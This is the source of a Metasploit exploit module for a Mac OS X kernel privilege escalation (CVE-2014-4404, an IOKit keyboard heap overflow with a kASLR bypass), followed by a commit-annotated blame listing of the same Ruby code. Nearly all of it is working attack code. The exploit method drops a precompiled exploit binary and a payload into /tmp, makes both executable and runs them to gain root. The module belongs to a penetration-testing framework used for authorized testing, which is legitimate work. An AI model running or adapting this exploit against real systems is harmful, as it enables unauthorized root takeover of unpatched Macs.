metasploit-framework/modules/exploits/osx/local/iokit_keyboard_root.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',
      'Description'   => %q{
        A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory
        corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel
        pointers can also be leaked, allowing a full kASLR bypass.

        Tested on Mavericks 10.9.5, and should work on previous versions.

        The issue has been patched silently in Yosemite.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Ian Beer', # discovery, advisory, publication, and a most excellent blog post
          'joev' # copy/paste monkey
        ],
      'References'    =>
        [
          [ 'CVE', '2014-4404' ],
          [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],
          # Heap overflow:
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],
          # kALSR defeat:
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => [ ARCH_X86_64 ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86_64
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014'
    ))
  end

  def check
    if ver_lt(osx_ver, "10.10")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
    exploit = File.read(File.join(osx_path, 'key_exploit.bin'))
    pload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

    print_status "Writing temp file as '#{tmpfile}'"
    write_file(tmpfile, exploit)
    register_file_for_cleanup(tmpfile)

    print_status "Writing payload file as '#{payloadfile}'"
    write_file(payloadfile, pload)
    register_file_for_cleanup(payloadfile)

    print_status "Executing payload..."
    cmd_exec("chmod +x #{tmpfile}")
    cmd_exec("chmod +x #{payloadfile}")
    cmd_exec("#{tmpfile} #{payloadfile}")
  end

  def osx_ver
    cmd_exec("sw_vers -productVersion").to_s.strip
  end

  def ver_lt(a, b)
    Gem::Version.new(a) < Gem::Version.new(b)
  end

end
Add an OSX privilege escalation from Google's Project Zero. 2014-11-25 18:34:16 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex'`

			`class Metasploit3 < Msf::Exploit::Local`
			`Rank = NormalRanking`

			`include Msf::Post::File`
			`include Msf::Exploit::EXE`
			`include Msf::Exploit::FileDropper`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',`
			`'Description' => %q{`
			`A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory`
			`corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel`
			`pointers can also be leaked, allowing a full kASLR bypass.`

Update description, rename xnu_ver -> osx_ver. 2014-11-25 18:38:29 +00:00			`Tested on Mavericks 10.9.5, and should work on previous versions.`
Add an OSX privilege escalation from Google's Project Zero. 2014-11-25 18:34:16 +00:00
			`The issue has been patched silently in Yosemite.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Ian Beer', # discovery, advisory, publication, and a most excellent blog post`
			`'joev' # copy/paste monkey`
			`],`
			`'References' =>`
			`[`
			`[ 'CVE', '2014-4404' ],`
			`[ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],`
			`# Heap overflow:`
			`[ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],`
			`# kALSR defeat:`
			`[ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]`
			`],`
			`'Platform' => 'osx',`
			`'Arch' => [ ARCH_X86_64 ],`
			`'SessionTypes' => [ 'shell', 'meterpreter' ],`
			`'Targets' => [`
Update description, rename xnu_ver -> osx_ver. 2014-11-25 18:38:29 +00:00			`[ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)',`
Add an OSX privilege escalation from Google's Project Zero. 2014-11-25 18:34:16 +00:00			`{`
			`'Platform' => 'osx',`
			`'Arch' => ARCH_X86_64`
			`}`
			`]`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Sep 24 2014'`
			`))`
			`end`

			`def check`
Update description, rename xnu_ver -> osx_ver. 2014-11-25 18:38:29 +00:00			`if ver_lt(osx_ver, "10.10")`
Add an OSX privilege escalation from Google's Project Zero. 2014-11-25 18:34:16 +00:00			`Exploit::CheckCode::Vulnerable`
			`else`
			`Exploit::CheckCode::Safe`
			`end`
			`end`

			`def exploit`
			`osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')`
			`exploit = File.read(File.join(osx_path, 'key_exploit.bin'))`
			`pload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)`
			`tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"`
			`payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"`

			`print_status "Writing temp file as '#{tmpfile}'"`
			`write_file(tmpfile, exploit)`
			`register_file_for_cleanup(tmpfile)`

			`print_status "Writing payload file as '#{payloadfile}'"`
			`write_file(payloadfile, pload)`
			`register_file_for_cleanup(payloadfile)`

			`print_status "Executing payload..."`
			`cmd_exec("chmod +x #{tmpfile}")`
			`cmd_exec("chmod +x #{payloadfile}")`
			`cmd_exec("#{tmpfile} #{payloadfile}")`
			`end`

Update description, rename xnu_ver -> osx_ver. 2014-11-25 18:38:29 +00:00			`def osx_ver`
Add an OSX privilege escalation from Google's Project Zero. 2014-11-25 18:34:16 +00:00			`cmd_exec("sw_vers -productVersion").to_s.strip`
			`end`

			`def ver_lt(a, b)`
			`Gem::Version.new(a) < Gem::Version.new(b)`
			`end`

			`end`